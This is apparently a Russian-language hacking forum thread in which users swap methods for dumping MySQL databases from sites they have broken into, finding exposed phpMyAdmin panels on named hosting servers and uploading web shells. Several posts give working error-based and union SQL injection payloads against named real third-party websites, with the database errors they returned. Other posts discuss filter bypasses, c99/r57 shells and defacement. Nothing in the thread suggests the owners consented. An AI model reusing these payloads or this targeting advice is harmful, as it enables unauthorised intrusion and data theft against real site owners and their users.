1. Воспользоваться PhpMyAdmin. (вкладка Export). 2. Залить дампер и слить базу (что-то типа Sypex Dumper и т.д.).
Ну во-первых, если коннект к базе разрешен извне, можешь залить PhpMyAdmin на любой свой сервер, в конфиге вместо localhost прописать IP сайта / логин и пароль / авторизация http. Или через любые другие утилиты умеющие подключаться к MySQL. Если с удаленным подключением фейл, можно попробовать типовые пути, вдруг есть на сервере: 1. В корне сайта и в каталоге admin если есть - /pma/, /phpmyadmin/, /myadmin/ 2. Те же варианты, только на субдомене - pma.site.com 3. Если это хостинг на базе ISP (только прописывай именно IP а не доменное имя) - https://127.0.0.1/myadmin/
Да, там у них в зависимости от тарифа, имена имеют вид: https://bitrix132.timeweb.ru/pma/index.php и так далее.
У timeweb в зоне субдомена логин или целая площадка? Если площадка возможно повезет: HTTP http://phoenix.timeweb.ru/phpMyAdmin/ http://scorpius.timeweb.ru/phpMyAdmin/ HTTPS https://phoenix.timeweb.ru/pma/ https://scorpius.timeweb.ru/pma/
могу редактировать несколько php файлов на сервере но к сожалению там ограничение в 500 символов кода подскажите как можно залить шелл??
делают такой зпрос 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' вывод: Duplicate column name '5.1.69' отправляю такой запрос 'and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)='1/ вывод: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+from+information_schema.tables+li' at line 1 в чем дело?
В том, что твои "плюсы" отправляются напрямую в субд. 2 Oxotnik, эвал без палива? Что еще, по-твоему мнению, "без палива"? с99/r57 в корне или, быть может, дефейс главной ресурса?
Тут фильтр на наличие самого слова Select в запросе. http://elc.in.ua/study.php?id=8+and+1=1+group+by+3+--+ Ковыряю.
http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть Code: http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+ http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://elc.in.ua/study.php?id=8%20and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20limit%2040,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)=1 не могу дальше, ели грузит сайт! походу все накинулись со сканерами)
В общем есть страничка.. boom.php?page=1&subcat= на который с ' выдает ошибку CALL failed: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',0,5)' at line 1 Ничего не фильтрует наверно), как можно залить шелл или получить таблицы? Киньте пример мб..
